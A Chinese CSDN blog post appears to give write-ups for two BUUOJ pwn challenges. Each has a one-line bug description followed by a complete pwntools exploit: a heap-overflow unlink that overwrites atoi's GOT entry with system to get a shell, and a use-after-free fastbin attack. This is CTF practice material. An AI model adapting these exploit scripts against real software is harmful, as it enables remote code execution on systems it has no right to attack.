zctf2016_note2，wustctf2020_easyfast

cut_maize

已于 2022-04-04 17:18:40 修改

阅读量102

点赞数

分类专栏： PWN 文章标签：安全 unix

于 2022-04-04 16:51:25 首次发布

本文链接：https://blog.csdn.net/m0_57754423/article/details/123956266

版权

PWN 专栏收录该内容

33 篇文章 0 订阅

订阅专栏

漏洞点：

思路：

通过add(0,'')绕过，实现堆溢出，got表可写，随后进行unlink即可。

exp:

from pwn import *
 
# p = process('./note2')
p = remote('node4.buuoj.cn',28447)
e = ELF('./note2')
libc = ELF("./libc-2.23.so")
atoi_got = e.got['atoi']
free_got = e.got['free']
puts_plt = e.plt['puts']
p.sendlineafter('Input your name:','amazh')
p.sendlineafter('Input your address:','aaaa')

 
def add(size,content):
   p.sendlineafter('option--->>','1')
   p.sendlineafter('(less than 128)',str(size))
   p.sendlineafter('Input the note content:',content)
 
def show(index):
   p.sendlineafter('option--->>','2')
   p.sendlineafter('Input the id of the note:',str(index))
 
def edit(index,content,mode=1):
   p.sendlineafter('option--->>','3')
   p.sendlineafter('Input the id of the note:',str(index))
   p.sendlineafter('[1.overwrite/2.append]',str(mode))
   p.sendlineafter('TheNewContents:',content)
 
 
def delete(index):
   p.sendlineafter('option--->>','4')
   p.sendlineafter('Input the id of the note:',str(index))

chunk_ptr = 0x602120
def dbg():
	gdb.attach(p)
	pause()
p.timeout = 0.5

pl1 = p64(0) + p64(0xa1) + p64(chunk_ptr-0x18) + p64(chunk_ptr-0x10) +'aaaa'
add(0x80,pl1)#0
add(0x0,'')#1
add(0x80,'')#2
add(0x10,'a')#3

pl2= 'a'*0x18+ p8(0x90)
edit(1,pl2)
for i in range(7):
	edit(1,'a'*(0x17-i) )
edit(1,'a'*0x10 +'\xa0')
delete(2)
edit(0,'a'*0x18 + p64(chunk_ptr+ 8))
edit(0,p64(atoi_got))
show(1)
p.recvuntil('Content is ')
addr = u64(p.recv(6).ljust(8,'\x00'))
success('addr:' + hex(addr))
base = addr - libc.sym['atoi']
success('base:' + hex(base))
sys = base + libc.sym['system']
edit(1,p64(sys))
p.sendline('/bin/sh')
# dbg()
p.interactive()

漏洞点：uaf

exp:

from pwn import *

# p=process('./ezfast')
p=remote("node4.buuoj.cn",28780)
context.log_level="debug"

def add(size):
	p.recvuntil('choice>')
	p.sendline('1')
	p.recvuntil('size>')
	p.sendline(str(size))
	

def delete(index):
	p.recvuntil('choice>')
	p.sendline('2')
	p.recvuntil('index>')
	p.sendline(str(index))

def edit(idx,content):
	p.sendlineafter('choice>','3')
	p.sendlineafter('index>',str(idx))
	p.send(content)

def backdoor():
	p.sendlineafter('choice>','4')

def dbg():
	gdb.attach(p)
	pause()
p.timeout = 0.5

add(0x40)#0
delete(0)
edit(0,p64(0x602080))
add(0x40)#0
add(0x40)#1
edit(2,p64(0))
# dbg()
backdoor()
p.interactive()

cut_maize

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
zctf2016_note2，wustctf2020_easyfast

漏洞点：思路：通过add(0,'')绕过，实现堆溢出，got表可写，随后进行unlink即可。exp:from pwn import * # p = process('./note2')p = remote('node4.buuoj.cn',28447)e = ELF('./note2')libc = ELF("./libc-2.23.so")atoi_got = e.got['atoi']free_got = e.got['free']puts_plt = e.pl.
复制链接

扫一扫